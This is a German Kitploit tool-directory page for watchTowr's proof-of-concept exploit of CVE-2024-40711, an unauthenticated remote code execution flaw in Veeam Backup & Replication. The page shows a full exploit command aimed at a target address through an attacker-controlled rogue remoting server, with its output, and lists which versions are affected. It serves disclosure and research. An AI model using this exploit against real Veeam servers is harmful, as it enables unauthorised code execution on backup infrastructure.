Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-40711 — Pre-Auth-Exploit für CVE-2024-40711 | Kitploit
Tools/GitHubGitHub/watchtowrlabs/cve-2024-40711
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed TeamingRemote-Access-Tool
GitHubwatchtowrlabs/cve-2024-40711

CVE-2024-40711

Pre-Auth-Exploit für CVE-2024-40711

Repository anzeigen
5518vor 1 JahrVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-40711

Exploit für Veeam Backup and Replication Pre-Auth-Deserialisierung CVE-2024-40711

Siehe unseren Blogbeitrag für technische Details.

https://github.com/user-attachments/assets/24e8122c-3e84-408b-87a9-684a9aabeb70

PoC in Aktion

root@kitploit:~
CVE-2024-40711.exe -f binaryformatter -g Veeam -c http://192.168.201.1:8000/trigger --targetveeam 192.168.201.158



                 __         .__  ___________
__  _  _______ _/  |_  ____ |  |_\__    ___/_____  _  _________
\ \/ \/ /\__  \\   __\/ ___\|  |  \|    | /  _ \ \/ \/ /\_  __ \
 \     /  / __ \|  | \  \___|   Y  \    |(  <_> )     /  |  | \/
  \/\_/  (____  /__|  \___  >___|  /____| \____/ \/\_/   |__|
              \/          \/     \/


        (*) Veeam Backup & Replication Unauthenticated Remote Code Execution Exploit (CVE-2024-40711)
          - Vulnerability Discovered by Florian Hauser (@frycos) at CODE WHITE Gmbh (@codewhitesec)
          - Exploit Written by Sina Kheirkhah (@SinSinology) at watchTowr
          - Thank you to my dear friend Soroush Dalili (@irsdl) for his help

        CVEs: [CVE-2024-40711]

(*) Creating payload for 'cmd /c mspaint.exe'
(*) Wrapping payload in the CDbCryptoKeyInfo custom gadget
(*) Sending Remoting Trigger
(*) Started Rogue Server
HttpServerChannel for 'trigger' created:
  http://192.168.201.1:8000/trigger

Press any key to exit ...
[*] Processing message for '/trigger' from 192.168.201.158:50592 ... sending payload!
Tool herunterladen

Florian Hauser

Diese Schwachstelle wurde von Florian Hauser (@frycos) von CODE WHITE GmbH (@codewhitesec) entdeckt. Folgen Sie unbedingt seiner herausragenden Forschung – unsere Rolle bestand lediglich darin, den Exploit für dieses Problem nachzubauen und zu entwickeln.

Betroffene Versionen

VersionStatus
12.2.0.334Vollständig gepatcht. Nicht von den Schwachstellen in diesem Blogbeitrag betroffen.
12.1.2.172Betroffen, aber die Ausnutzung erfordert eine Authentifizierung. Benutzer mit niedrigen Rechten können beliebigen Code ausführen.
12.1.1.56 und früherAnfällig für nicht authentifizierte RCE.

Exploit-Autoren

Dieser Exploit wurde von Sina Kheirkhah (@SinSinology) von watchTowr (@watchtowrcyber) geschrieben.

Wir möchten auch die Gelegenheit nutzen, Soroush Dalili für seine Hilfe bei diesem Exploit zu danken.

Folgen Sie watchTowr Labs

Für die neueste Sicherheitsforschung folgen Sie dem watchTowr Labs-Team.

  • https://labs.watchtowr.com/
  • https://twitter.com/watchtowrcyber
  • https://labs.watchtowr.com/veeam-backup-response-rce-with-auth-but-mostly-without-auth-cve-2024-40711-2/
  • https://github.com/codewhitesec/RogueRemotingServer
  • https://github.com/tyranid/ExploitRemotingService
  • https://www.veeam.com/kb4649